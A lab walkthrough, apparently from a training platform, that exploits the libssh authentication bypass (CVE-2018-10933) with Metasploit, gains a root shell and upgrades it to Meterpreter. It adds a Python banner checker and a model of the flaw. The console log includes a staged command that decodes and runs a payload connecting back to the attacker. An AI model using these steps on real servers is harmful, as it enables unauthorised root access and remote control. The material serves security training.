Exploiting A Vulnerable SSH Server
Exploiting SSH
SSH (Secure Shell) is an encrypted remote administration protocol and the replacement for Telnet.
It is typically used for remote access to servers and systems.
SSH listens on TCP port 22 by default; like any other service it can be configured to use a different TCP port, so do not rely on the port number alone when fingerprinting.
libssh is a multiplatform C library implementing the SSHv2 protocol on both the client and the server side.
libssh versions 0.6.0 through 0.7.5 and 0.8.0 through 0.8.3 contain an authentication bypass in the server-side code (CVE-2018-10933) that can be exploited to execute commands on the target server without valid credentials.
Demo: Exploiting A Vulnerable SSH Server
In this demo we exploit libssh running on the Linux target with the Metasploit module written for this vulnerability, and then upgrade the resulting shell into a Meterpreter session.
First, note the Kali machine's IP address on the lab interface:
ifconfig
eth1: inet 192.40.32.2
Start the PostgreSQL service, which backs the Metasploit database; db_nmap and workspaces need it.
service postgresql start
Start the Metasploit Framework console.
msfconsole
Create a workspace so the scan results and sessions for this target are kept together.
workspace -a libssh
Set RHOSTS as a global variable so every module we load picks up the target address.
setg RHOSTS 192.40.32.3
Run an Nmap scan against the target to verify that SSH is running and that the server identifies itself as libssh.
-sS: SYN scan.
-sV: service version detection (this is what reads the SSH banner).
-O: operating system detection.
db_nmap -sS -sV -O 192.40.32.3
The db_nmap command runs Nmap from within the MSF console and stores the results in the MSF database under the current workspace.
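As an added example (not part of the original walkthrough and not the module's code), the same fingerprinting without Nmap: read the SSH identification line over a raw TCP socket and compare the libssh version with the vulnerable ranges the module description gives, 0.6.0 through 0.7.5 and 0.8.0 through 0.8.3, inclusive. The banner form SSH-2.0-libssh_X.Y.Z matches the Nmap fingerprint recorded later on this page; also accepting a hyphen separator, and the default target address, are assumptions.

```python
"""Added example: grab an SSH server's identification line and decide whether
it is a libssh build inside the CVE-2018-10933 auth-bypass ranges. Not part of
the original walkthrough and not the Metasploit module's code; the version
ranges are the ones quoted from the module description (inclusive)."""
import re
import socket

VULNERABLE_RANGES = (((0, 6, 0), (0, 7, 5)), ((0, 8, 0), (0, 8, 3)))

# libssh announces itself as "SSH-2.0-libssh_X.Y.Z" (see the Nmap service
# fingerprint later on this page). Accepting "libssh-X.Y.Z" is an assumption.
_LIBSSH_RE = re.compile(r"^SSH-2\.0-libssh[_-](\d+)\.(\d+)\.(\d+)")

# RFC 4253 4.2: the server may send other lines before its identification
# string, so look for the first complete line that starts with "SSH-".
_IDENT_RE = re.compile(rb"(?m)^(SSH-[^\r\n]*)\r?\n")


def parse_libssh_version(banner):
    """Return (major, minor, patch) for a libssh banner, else None."""
    m = _LIBSSH_RE.match(banner.strip())
    return tuple(int(x) for x in m.groups()) if m else None


def is_vulnerable_version(version):
    """Inclusive range check; comparing tuples keeps 0.10.x above 0.8.x."""
    return any(lo <= version <= hi for lo, hi in VULNERABLE_RANGES)


def assess_banner(banner):
    """Classify a banner as 'vulnerable', 'not-vulnerable' or 'not-libssh'."""
    version = parse_libssh_version(banner)
    if version is None:
        return "not-libssh"
    return "vulnerable" if is_vulnerable_version(version) else "not-vulnerable"


def extract_identification(raw):
    """Pull the newline-terminated identification line out of raw bytes
    (anything after it is binary key-exchange traffic and is ignored)."""
    m = _IDENT_RE.search(raw)
    return m.group(1).decode("ascii", errors="replace") if m else ""


def grab_banner(host, port=22, timeout=5.0):
    """Connect and read until the identification line is complete. The server
    sends it unprompted right after the TCP handshake, before key exchange."""
    buf = b""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        while not extract_identification(buf) and len(buf) < 4096:
            try:
                chunk = sock.recv(256)
            except socket.timeout:
                break
            if not chunk:
                break
            buf += chunk
    return extract_identification(buf)


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "192.198.72.3"  # lab target
    ident = grab_banner(target)
    print(ident or "<no SSH banner>", "->", assess_banner(ident))
```

Run it with the target IP as the only argument. A banner check of this kind is only a version hint: a distribution may backport the fix without changing the version string, so treat "vulnerable" as "worth running the module against", not as proof.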
List the services Nmap recorded in the database.
services
Check whether the SSH service is vulnerable with the libssh_auth_bypass auxiliary module. Its description reads:
libssh Authentication Bypass Scanner
This module exploits an authentication bypass in libssh server code where a USERAUTH_SUCCESS message is sent in place of the expected USERAUTH_REQUEST message. libssh versions 0.6.0 through 0.7.5 and 0.8.0 through 0.8.3 are vulnerable. Note that this module's success depends on whether the server code can trigger the correct (shell/exec) callbacks despite only the state machine's authenticated state being set. Therefore, you may or may not get a shell if the server requires additional code paths to be followed.
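As an added illustration (not libssh's code and not the Metasploit module), the following Python models the state-machine flaw the module description refers to: the server honours a USERAUTH_SUCCESS message, which only a server should ever send, so a client that sends it instead of USERAUTH_REQUEST lands in the authenticated state and can open a channel. The hardened dispatcher beside it enforces message direction per role before consulting the handler table. The message numbers are the real ones from RFC 4252/4253/4254; the handler table, session object and sample credentials are constructed for the example.

```python
"""Added model of the state-machine flaw behind the libssh auth bypass
(CVE-2018-10933). Illustrative code, not libssh's source: message numbers are
the real ones from RFC 4252/4253/4254, but the handler table, session object
and credentials are constructed for this example."""

SSH_MSG_DISCONNECT = 1
SSH_MSG_USERAUTH_REQUEST = 50          # client -> server
SSH_MSG_USERAUTH_FAILURE = 51          # server -> client
SSH_MSG_USERAUTH_SUCCESS = 52          # server -> client ONLY
SSH_MSG_CHANNEL_OPEN = 90              # client -> server (shell/exec follow)
SSH_MSG_CHANNEL_OPEN_CONFIRMATION = 91 # server -> client

# Message types a server may legitimately receive from a client at this stage.
CLIENT_TO_SERVER = {SSH_MSG_USERAUTH_REQUEST, SSH_MSG_CHANNEL_OPEN}

SAMPLE_CREDENTIALS = {"admin": "hunter2"}   # constructed sample, not real


class Session:
    def __init__(self, credentials):
        self.credentials = credentials
        self.authenticated = False


def on_userauth_request(session, payload):
    """Proper path: verify credentials, then flip the authenticated flag."""
    user, password = payload
    if session.credentials.get(user) == password:
        session.authenticated = True
        return SSH_MSG_USERAUTH_SUCCESS
    return SSH_MSG_USERAUTH_FAILURE


def on_userauth_success(session, payload):
    """A client-side notion ('the server accepted us'). It should never be
    reachable on a server, yet the vulnerable server processed the message as
    valid input and set only the state machine's authenticated state."""
    session.authenticated = True
    return None


def on_channel_open(session, payload):
    """Shell/exec callbacks are reachable only from an authenticated session."""
    if session.authenticated:
        return SSH_MSG_CHANNEL_OPEN_CONFIRMATION
    return SSH_MSG_DISCONNECT


HANDLERS = {
    SSH_MSG_USERAUTH_REQUEST: on_userauth_request,
    SSH_MSG_USERAUTH_SUCCESS: on_userauth_success,   # the bug: server-only msg
    SSH_MSG_CHANNEL_OPEN: on_channel_open,
}


def dispatch_vulnerable(session, msg_type, payload=None):
    """Vulnerable dispatcher: any message type with a handler is processed."""
    handler = HANDLERS.get(msg_type)
    return handler(session, payload) if handler else SSH_MSG_DISCONNECT


def dispatch_hardened(session, msg_type, payload=None):
    """Hardened dispatcher: check message direction before the handler lookup,
    so a server-only message arriving from a client is fatal to the session."""
    if msg_type not in CLIENT_TO_SERVER:
        return SSH_MSG_DISCONNECT
    return HANDLERS[msg_type](session, payload)


def run_bypass(dispatch):
    """What the module does: never send USERAUTH_REQUEST, send USERAUTH_SUCCESS
    instead, then ask for a channel. Returns the reply to the channel open
    (91 = got a channel, 1 = disconnected)."""
    session = Session(SAMPLE_CREDENTIALS)
    if dispatch(session, SSH_MSG_USERAUTH_SUCCESS) == SSH_MSG_DISCONNECT:
        return SSH_MSG_DISCONNECT
    return dispatch(session, SSH_MSG_CHANNEL_OPEN)


def run_login(dispatch, user, password):
    """Ordinary password login for comparison; both dispatchers must accept it."""
    session = Session(SAMPLE_CREDENTIALS)
    reply = dispatch(session, SSH_MSG_USERAUTH_REQUEST, (user, password))
    if reply != SSH_MSG_USERAUTH_SUCCESS:
        return reply
    return dispatch(session, SSH_MSG_CHANNEL_OPEN)


if __name__ == "__main__":
    print("vulnerable server, bypass:", run_bypass(dispatch_vulnerable))
    print("hardened server, bypass:  ", run_bypass(dispatch_hardened))
    print("hardened server, login:   ", run_login(dispatch_hardened, "admin", "hunter2"))
```

The point for a code review is where the direction check sits: in front of the handler lookup, so that no individual handler has to remember which role it is running in. The model also shows why the module description warns that a shell is not guaranteed: the bypass only sets the authenticated flag, and whatever the server's channel-open and shell/exec callbacks check beyond that flag still has to pass.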
search libssh_auth_bypass
use auxiliary/scanner/ssh/libssh_auth_bypass
show options
The option to set is SPAWN_PTY, which requests a pseudo-terminal for the session so that the resulting shell is interactive. RHOSTS is already populated from the global variable.
set SPAWN_PTY true
run
The module reports a command shell session opening on the target, which means the authentication bypass worked. Interact with the session:
sessions 1
Check which user the shell is running as.
whoami
We are root, so we already have administrative privileges on the target and no privilege escalation is needed.
Enumerate the distribution release.
cat /etc/*release
Enumerate the kernel version.
uname -r
Next, upgrade the command shell session to a Meterpreter session. Background the current session with Ctrl+Z and confirm with y.
Then use the post-exploitation module shell_to_meterpreter, which stages a Meterpreter payload through the existing shell and starts a handler for it to connect back to.
Set LHOST to the Kali IP on eth1 (Metasploit resolves an interface name to its address) and SESSION to the ID of the shell session.
use post/multi/manage/shell_to_meterpreter
show options
set LHOST eth1
set SESSION 1
run
Once the handler reports that a Meterpreter session has opened, list the sessions and interact with the new one. If the module then prints an "Unable to execute the following command" error, the session had already opened before the error was printed; verify it with sessions and carry on.
sessions
sessions 2
Confirm the context with sysinfo and getuid. getuid reports uid=0, so we already have root privileges and do not need to escalate on the target.
meterpreter > sysinfo
meterpreter > getuid
That is how to exploit a vulnerable SSH server.
Vulnerable SSH server
Overview
The target server as described below is running a vulnerable SSH server. Your task is to fingerprint the application using command line tools available on the Kali terminal and then exploit the application using the appropriate Metasploit module. Get a Meterpreter shell on the target!
Instructions:
- This lab is dedicated to you! No other users are on this network :)
- Once you start the lab, you will have access to a root terminal of a Kali instance
- Your Kali has an interface with IP address 192.X.Y.Z. Run “ip addr” to know the values of X and Y.
- The target server should be located at the IP address 192.X.Y.3.
- Do not attack the gateway located at IP address 192.X.Y.1
- postgresql is not running by default so Metasploit may give you an error about this when starting
Solutions
The solution for this lab can be found in the following manual: https://assets.ine.com/labs/ad-manuals/walkthrough-448.pdf
My own walkthrough
root@attackdefense:~# ifconfig
eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.198.72.2 netmask 255.255.255.0 broadcast 192.198.72.255
ether 02:42:c0:c6:48:02 txqueuelen 0 (Ethernet)
Target IP Address: 192.198.72.3
root@attackdefense:~# service postgresql start
[ ok ] Starting PostgreSQL 11 database server: main.
root@attackdefense:~# msfconsole -q
msf5 > workspace -a libssh
[*] Added workspace: libssh
[*] Workspace: libssh
msf5 > setg RHOSTS 192.198.72.3
RHOSTS => 192.198.72.3
msf5 > db_nmap -sS -sV -O 192.198.72.3
[*] Nmap: Starting Nmap 7.70 ( https://nmap.org ) at 2023-02-03 10:11 UTC
[*] Nmap: Nmap scan report for target-1 (192.198.72.3)
[*] Nmap: Host is up (0.000047s latency).
[*] Nmap: Not shown: 999 closed ports
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 22/tcp open ssh (protocol 2.0)
[*] Nmap: 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
[*] Nmap: SF-Port22-TCP:V=7.70%I=7%D=2/3%Time=63DCDDE7%P=x86_64-pc-linux-gnu%r(NULL,
[*] Nmap: SF:16,"SSH-2\.0-libssh_0\.8\.3\r\n");
[*] Nmap: MAC Address: 02:42:C0:C6:48:03 (Unknown)
[*] Nmap: No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
[*] Nmap: TCP/IP fingerprint:
[*] Nmap: OS:SCAN(V=7.70%E=4%D=2/3%OT=22%CT=1%CU=39471%PV=N%DS=1%DC=D%G=Y%M=0242C0%TM
[*] Nmap: OS:=63DCDDF2%P=x86_64-pc-linux-gnu)SEQ(SP=100%GCD=1%ISR=10F%TI=Z%CI=Z%II=I%
[*] Nmap: OS:TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5
[*] Nmap: OS:=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=
[*] Nmap: OS:FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%
[*] Nmap: OS:A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0
[*] Nmap: OS:%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S
[*] Nmap: OS:=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R
[*] Nmap: OS:=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N
[*] Nmap: OS:%T=40%CD=S)
[*] Nmap: Network Distance: 1 hop
[*] Nmap: OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 18.13 seconds
msf5 > services
Services
========

host          port  proto  name  state  info
----          ----  -----  ----  -----  ----
192.198.72.3  22    tcp    ssh   open   protocol 2.0
msf5 > search libssh_auth_bypass
Matching Modules
================

   #  Name                                      Disclosure Date  Rank    Check  Description
   -  ----                                      ---------------  ----    -----  -----------
   1  auxiliary/scanner/ssh/libssh_auth_bypass  2018-10-16       normal  Yes    libssh Authentication Bypass Scanner
msf5 > use auxiliary/scanner/ssh/libssh_auth_bypass
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > show options
Module options (auxiliary/scanner/ssh/libssh_auth_bypass):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   CHECK_BANNER  true             no        Check banner for libssh
   CMD                            no        Command or alternative shell
   RHOSTS        192.198.72.3     yes       The target address range or CIDR identifier
   RPORT         22               yes       The target port
   SPAWN_PTY     false            no        Spawn a PTY
   THREADS       1                yes       The number of concurrent threads

Auxiliary action:

   Name   Description
   ----   -----------
   Shell  Spawn a shell
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > set SPAWN_PTY true
SPAWN_PTY => true
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > run
[*] 192.198.72.3:22 - Attempting authentication bypass
[*] Command shell session 1 opened (192.198.72.2:38423 -> 192.198.72.3:22) at 2023-02-03 10:19:13 +0000
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > sessions
Active sessions
===============

  Id  Name  Type   Information                                                  Connection
  --  ----  ----   -----------                                                  ----------
  1         shell  libssh Authentication Bypass Scanner (SSH-2.0-libssh_0.8.3)  192.198.72.2:38423 -> 192.198.72.3:22 (192.198.72.3)
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > sessions 1
[*] Starting interaction with 1...
[root@victim-1 /]# whoami
whoami
root
[root@victim-1 /]# cat /etc/*release
cat /etc/*release
NAME="Arch Linux"
PRETTY_NAME="Arch Linux"
ID=arch
ID_LIKE=archlinux
ANSI_COLOR="0;36"
HOME_URL="https://www.archlinux.org/"
SUPPORT_URL="https://bbs.archlinux.org/"
BUG_REPORT_URL="https://bugs.archlinux.org/"
[root@victim-1 /]# uname -r
uname -r
5.4.0-125-generic
[root@victim-1 /]# ^Z
Background session 1? [y/N] y
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > search shell_to_meterpreter
Matching Modules
================

   #  Name                                    Disclosure Date  Rank    Check  Description
   -  ----                                    ---------------  ----    -----  -----------
   1  post/multi/manage/shell_to_meterpreter                   normal  No     Shell to Meterpreter Upgrade
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > use post/multi/manage/shell_to_meterpreter
msf5 post(multi/manage/shell_to_meterpreter) > show options
Module options (post/multi/manage/shell_to_meterpreter):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   HANDLER  true             yes       Start an exploit/multi/handler to receive the connection
   LHOST                     no        IP of host that will receive the connection from the payload (Will try to auto detect).
   LPORT    4433             yes       Port for payload to connect to.
   SESSION                   yes       The session to run this module on.
msf5 post(multi/manage/shell_to_meterpreter) > set LHOST eth1
LHOST => 192.198.72.2
msf5 post(multi/manage/shell_to_meterpreter) > set SESSION 1
SESSION => 1
msf5 post(multi/manage/shell_to_meterpreter) > run
[!] SESSION may not be compatible with this module.
[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.198.72.2:4433
[*] Sending stage (985320 bytes) to 192.198.72.3
[*] Meterpreter session 2 opened (192.198.72.2:4433 -> 192.198.72.3:43780) at 2023-02-03 10:26:41 +0000
[-] Error: Unable to execute the following command: "echo -n f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAVIAECDQAAAAAAAAAAAAAADQAIAABAAAAAAAAAAEAAAAAAAAAAIAECACABAjPAAAASgEAAAcAAAAAEAAAagpeMdv341NDU2oCsGaJ4c2Al1towMZIAmgCABFRieFqZlhQUVeJ4UPNgIXAeRlOdD1oogAAAFhqAGoFieMxyc2AhcB5vesnsge5ABAAAInjwesMweMMsH3NgIXAeBBbieGZtgywA82AhcB4Av/huAEAAAC7AQAAAM2A>>'/tmp/tRqxX.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/MXLoT' < '/tmp/tRqxX.b64' ; chmod +x '/tmp/MXLoT' ; '/tmp/MXLoT' & sleep 2 ; rm -f '/tmp/MXLoT' ; rm -f '/tmp/tRqxX.b64'"
[-] Output: "[1] 21"
[*] Post module execution completed
msf5 post(multi/manage/shell_to_meterpreter) > sessions
Active sessions
===============

  Id  Name  Type         Information                                                  Connection
  --  ----  ----         -----------                                                  ----------
  1         shell        libssh Authentication Bypass Scanner (SSH-2.0-libssh_0.8.3)  192.198.72.2:38423 -> 192.198.72.3:22 (192.198.72.3)
  2         meterpreter  x86/linux uid=0, gid=0, euid=0, egid=0 @ 192.198.72.3        192.198.72.2:4433 -> 192.198.72.3:43780 (192.198.72.3)
msf5 post(multi/manage/shell_to_meterpreter) > sessions 2
[*] Starting interaction with 2...
meterpreter > sysinfo
Computer : 192.198.72.3
OS : (Linux 5.4.0-125-generic)
Architecture : x64
BuildTuple : i486-linux-musl
Meterpreter : x86/linux
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter >